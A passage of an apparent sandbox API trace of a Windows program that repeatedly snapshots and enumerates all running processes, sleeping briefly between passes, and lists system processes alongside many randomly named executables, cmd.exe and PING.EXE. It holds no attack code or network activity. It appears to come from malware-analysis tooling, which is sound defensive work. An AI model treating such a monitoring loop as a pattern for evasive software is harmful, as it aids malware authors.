hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.957] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.959] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.960] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.961] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.962] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.963] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.964] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.965] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.966] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.967] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.968] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.969] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.970] CloseHandle (hObject=0xc4) returned 1 [0101.970] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.975] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.986] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.033] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.034] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.037] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.038] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.039] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.040] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.041] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.044] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.049] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.054] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0102.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0102.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0102.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0102.071] CloseHandle (hObject=0xbc) returned 1 [0102.071] Sleep (dwMilliseconds=0x12c) [0102.399] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0102.404] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, 